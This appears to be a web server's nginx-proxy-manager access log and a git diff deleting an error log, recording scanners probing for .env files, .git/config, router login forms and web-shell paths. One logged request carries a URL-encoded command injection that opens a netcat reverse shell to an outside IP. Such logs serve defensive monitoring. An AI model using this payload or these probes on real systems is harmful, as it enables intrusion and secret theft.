"/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:19:14:26 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:19:23:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:26:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:19:31:44 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:19:31:44 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:19:40:13 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36" "-" -[10/Sep/2025:19:46:49 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" "-" -[10/Sep/2025:19:51:37 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:19:51:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:51:43 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:19:51:44 +0000] 404 - GET http 172.237.28.60 "/security.txt" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:19:56:07 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:19:56:10 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:20:06:06 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:06:06 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:18:50 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:20:18:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:20:26:46 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:26:47 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:20:30:38 +0000] 400 - - http localhost "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:13:49 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:17:22 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/form.html" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/upl.php" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/t4" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" -[10/Sep/2025:21:17:22 +0000] 404 - GET http 172.237.28.60 "/geoip/" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/1.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/systembc/password.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:17:23 +0000] 404 - GET http 172.237.28.60 "/password.php" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" -[10/Sep/2025:21:32:59 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[10/Sep/2025:21:35:56 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:21:35:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:36:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:36:08 +0000] 404 - GET http 172.237.28.60 "/sitemap.xml" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" -[10/Sep/2025:21:36:12 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "-" "-" -[10/Sep/2025:21:37:04 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:21:37:04 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" -[10/Sep/2025:21:39:29 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:21:46:47 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:21:46:47 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:21:46:48 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:21:51:31 +0000] 404 - GET http apiv4.9hits.com "/test" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" -[10/Sep/2025:21:53:20 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:22:02:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:02:26 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:02:27 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:02:27 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:16:01 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:22:19:39 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:19:39 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:19:40 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:22:26:08 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:26:08 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:26:09 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:22:32:50 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:32:51 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:32:51 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:32:52 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:37:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:37:01 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:37:01 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:37:01 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:22:39:15 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" -[10/Sep/2025:22:40:31 +0000] 404 - GET http 172.237.28.60 "/.env" [Client 10.89.0.8] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:22:40:31 +0000] 405 - POST http 172.237.28.60 "/" [Client 10.89.0.8] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36" "-" -[10/Sep/2025:22:53:01 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:22:53:02 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:22:53:02 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:01:29 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:03:47 +0000] 404 - POST http 172.237.28.60 "/boaform/admin/formLogin" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://172.237.28.60:80/admin/login.asp" -[10/Sep/2025:23:03:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 0] [Gzip -] "-" "-" -[10/Sep/2025:23:10:36 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:10:37 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:10:37 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:10:38 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[10/Sep/2025:23:13:53 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "-" "-" -[10/Sep/2025:23:21:17 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" -[10/Sep/2025:23:24:38 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:24:39 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:24:39 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:26:48 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:26:49 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:26:49 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:54:02 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[10/Sep/2025:23:54:02 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[10/Sep/2025:23:54:03 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[10/Sep/2025:23:55:26 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:04:07 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:04:08 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:04:08 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:09:43 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" -[11/Sep/2025:00:11:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:11:10 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:11:11 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:11:12 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:13:15 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:13:15 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:13:16 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:15:10 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:15:11 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:15:11 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:19:14 +0000] 400 - GET http localhost "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:19:14 +0000] 400 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 252] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:19:15 +0000] 400 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 252] [Gzip -] "l9explore/1.2.2" "-" -[11/Sep/2025:00:25:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:25:35 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:25:35 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:25:36 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:29:46 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" -[11/Sep/2025:00:32:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:32:18 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 10.89.0.8] [Length 154] [Gzip -] "-" "-" -[11/Sep/2025:00:32:19 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "l9tcpid/v1.1.0" "-" -[11/Sep/2025:00:32:19 +0000] 404 - GET http 172.237.28.60 "/.git/config" [Client 10.89.0.8] [Length 122] [Gzip 1.35] "l9explore/1.2.2" "-" -[11/Sep/2025:00:34:39 +0000] 200 - GET http 172.237.28.60 "/" [Client 10.89.0.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" diff --git a/logs/2025-09-11/npm_error.log b/logs/2025-09-11/npm_error.log deleted file mode 100644 index e1289f2..0000000 --- a/logs/2025-09-11/npm_error.log +++ /dev/null @@ -1,46 +0,0 @@ -2025/09/10 07:27:12 [error] 189#189: *2 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=mkfifo%20%2Ftmp%2Ff%3B%20%2Fbin%2Fsh%20-i%20%3C%20%2Ftmp%2Ff%202%3E%261%20%7C%20nc%20196.251.84.66%206667%20%3E%20%2Ftmp%2Ff HTTP/1.1", host: "172.237.28.60:80" -2025/09/10 08:24:57 [alert] 194#194: *1013 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 09:01:08 [error] 195#195: *1018 open() "/var/www/html/login" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "84167165-jh888-17.tcr195p888.com" -2025/09/10 09:34:50 [error] 194#194: *1024 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 09:34:51 [error] 194#194: *1025 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "172.237.28.60" -2025/09/10 09:57:39 [error] 194#194: *1041 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 11:13:47 [alert] 195#195: *2067 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 11:13:55 [error] 194#194: *2071 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "172.237.28.60" -2025/09/10 11:30:45 [error] 194#194: *2080 open() "/var/www/html/portal/redlion" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /portal/redlion HTTP/1.1", host: "172.237.28.60" -2025/09/10 12:25:02 [error] 194#194: *2096 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 12:26:26 [alert] 194#194: *3016 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 12:26:51 [error] 195#195: *3017 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 13:23:16 [error] 194#194: *3022 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "172.237.28.60" -2025/09/10 13:47:48 [error] 2460#2460: *3029 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 16:00:23 [error] 2460#2460: *3048 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 16:59:43 [error] 2460#2460: *3071 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 18:33:41 [alert] 2461#2461: *4114 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 18:33:55 [error] 2460#2460: *4118 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "172.237.28.60" -2025/09/10 19:31:44 [error] 2460#2460: *4130 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 19:41:47 [alert] 4873#4873: *5146 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 19:51:44 [error] 4873#4873: *5154 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "172.237.28.60" -2025/09/10 20:06:06 [error] 4874#4874: *5157 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 20:18:50 [error] 4874#4874: *5159 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "172.237.28.60:80", referrer: "http://172.237.28.60:80/admin/login.asp" -2025/09/10 20:26:46 [error] 4874#4874: *5170 open() "/var/www/html/.env" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5180 open() "/var/www/html/form.html" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /form.html HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5181 open() "/var/www/html/upl.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /upl.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5182 open() "/var/www/html/t4" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /t4 HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:22 [error] 4874#4874: *5183 "/var/www/html/geoip/index.html" is not found (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /geoip/ HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [alert] 4874#4874: *6196 512 worker_connections are not enough while connecting to upstream, client: 127.0.0.1, server: localhost-nginx-proxy-manager, request: "GET /favicon.ico HTTP/1.1", upstream: "http://127.0.0.1:80/favicon.ico", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6197 open() "/var/www/html/1.php" failed (2: No such file or directory), client: 10.89.0.8, server: localhost-nginx-proxy-manager, request: "GET /1.php HTTP/1.1", host: "172.237.28.60" -2025/09/10 21:17:23 [error] 4873#4873: *6198 open() "/var/www/html/systembc/password.php" failed (2: 